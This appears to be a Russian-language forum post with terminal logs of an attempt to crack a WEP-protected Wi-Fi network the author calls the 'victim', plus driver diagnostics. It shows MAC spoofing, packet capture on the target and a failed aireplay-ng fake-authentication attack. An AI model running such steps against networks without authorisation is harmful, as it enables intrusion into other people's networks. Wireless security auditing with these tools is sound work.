консоль 1:
#XX:XX:XX:XX:XX:XX - мой мак
#XX:XX:XX:XX:XX:X1 - мой айфон (неисползуетса)
#XX:XX:XX:XX:XX:X2 - жертва
#d6:ee:41:69:48:cf - фейк
root@adr-laptop:/home/adr# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
929 NetworkManager
930 avahi-daemon
931 avahi-daemon
4214 dhclient
4756 wpa_supplicant
Interface Chipset Driver
wlan0 Unknown brcmsmac - [phy0]
(monitor mode enabled on mon0)
root@adr-laptop:/home/adr# ifconfig mon0 down
root@adr-laptop:/home/adr# macchanger -r mon0
Permanent MAC: XX:XX:XX:XX:XX:XX (Hon Hai Precision Ind. Co.,ltd.)
Current MAC: XX:XX:XX:XX:XX:XX (Hon Hai Precision Ind. Co.,ltd.)
New MAC: d6:ee:41:69:48:cf (unknown)
root@adr-laptop:/home/adr# ifconfig mon0 up
root@adr-laptop:/home/adr# airodump-ng mon0
CH 1 ][ Elapsed: 16 s ][ 2011-11-06 13:51
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:X1 -1 101 0 0 6 36 . OPN iPhone-ADR MyWi
XX:XX:XX:XX:XX:X2 -87 3 0 0 3 54e. WEP WEP Baze
BSSID STATION PWR Rate Lost Frames Probe
XX:XX:XX:XX:XX:X1 XX:XX:XX:XX:X1 -30 0 -12 22 101
#ctrl + c
root@adr-laptop:/home/adr# airodump-ng mon0 -c 3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out
CH 3 ][ Elapsed: 16 s ][ 2011-11-06 13:53 ][b][ fixed channel mon0: -1[/b]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:X2 -87 8 27 0 0 3 54e. WEP WEP Baze
BSSID STATION PWR Rate Lost Frames Probe
#ctrl + c
root@adr-laptop:/home/adr# airodump-ng mon0 -c 3,3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out
CH 3 ][ Elapsed: 8 s ][ 2011-11-06 13:54
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:X2 -86 14 0 0 3 54e. WEP WEP Baze
BSSID STATION PWR Rate Lost Frames Probe
#run aireplay-ng
CH 3 ][ Elapsed: 2 mins ][ 2011-11-06 13:56
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:X2 -86 246 0 0 3 54e. WEP WEP Baze
BSSID STATION PWR Rate Lost Frames Probe
XX:XX:XX:XX:XX:X2 D6:EE:41:69:48:CF 0 0 - 1 0 12
root@adr-laptop:/home/adr# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:X2 -e Baze mon0
No source MAC (-h) specified. Using the device MAC (D6:EE:41:69:48:CF)
13:56:22 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:X2) on channel -1
13:56:22 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
root@adr-laptop:/home/adr# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:X2 -e Baze mon0 --ignore-negative-one
No source MAC (-h) specified. Using the device MAC (D6:EE:41:69:48:CF)
13:56:31 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:X2) on channel -1
13:56:31 Sending Authentication Request (Open System)
13:56:33 Sending Authentication Request (Open System)
13:56:35 Sending Authentication Request (Open System)
13:56:37 Sending Authentication Request (Open System)
13:56:39 Sending Authentication Request (Open System)
13:56:41 Sending Authentication Request (Open System)
13:56:43 Sending Authentication Request (Open System)
13:56:45 Sending Authentication Request (Open System)
13:56:47 Sending Authentication Request (Open System)
13:56:49 Sending Authentication Request (Open System)
13:56:51 Sending Authentication Request (Open System)
13:56:53 Sending Authentication Request (Open System)
13:56:55 Sending Authentication Request (Open System)
13:56:57 Sending Authentication Request (Open System)
13:56:59 Sending Authentication Request (Open System)
13:57:01 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
root@adr-laptop:/home/adr#
система
root@adr-laptop:/home/adr# lspci | grep -i net
02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 02)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)
root@adr-laptop:/home/adr# ifconfig
eth2 Link encap:Ethernet HWaddr XX:XX:XX:XX:X1 #айфон
inet addr:192.168.21.7 Bcast:192.168.21.255 Mask:255.255.255.0
inet6 addr: fe80::21f:5bff:fe59:d74c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:30047 errors:0 dropped:1 overruns:0 frame:0
TX packets:32494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:18590227 (18.5 MB) TX bytes:5893094 (5.8 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:4493 errors:0 dropped:0 overruns:0 frame:0
TX packets:4493 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:356204 (356.2 KB) TX bytes:356204 (356.2 KB)
mon0 Link encap:UNSPEC HWaddr D6-EE-41-69-48-CF-30-30-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:14599 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2061943 (2.0 MB) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr XX:XX:XX:XX:XX
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
root@adr-laptop:/home/adr# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth2 no wireless extensions.
mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
root@adr-laptop:/home/adr# airdriver-ng detect
Found "Broadcom 4300" device: (bcm43xx)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)
Found "Broadcom 4300" device: (bcm43xx-mac80211)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)
USB devices (generic detection):
Bus 002 Device 003: ID 04fc:05d8 Sunplus Technology Co., Ltd Wireless keyboard/mouse
PCI devices (generic detection):
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)
root@adr-laptop:/home/adr# uname -a
Linux adr-laptop 3.0.0-12-generic-pae #20-Ubuntu SMP Fri Oct 7 16:37:17 UTC 2011 i686 i686 i386 GNU/Linux
#ОС Ubuntu 11.10
пітаюсь убить то што мешает...
root@adr-laptop:/home/adr# airmon-ng start
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
[b]929 NetworkManager
930 avahi-daemon
931 avahi-daemon
4214 dhclient
4756 wpa_supplicant[/b]
root@adr-laptop:/home/adr# service network-manager stop
network-manager stop/waiting
root@adr-laptop:/home/adr# kill 930 931 4214 4756
root@adr-laptop:/home/adr# airmon-ng start
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
[b]6835 avahi-daemon
6836 avahi-daemon[/b]
usage: airmon-ng <start|stop|check> <interface> [channel or frequency]
дальше повторються первые два листинга .. (ничего не изменилось)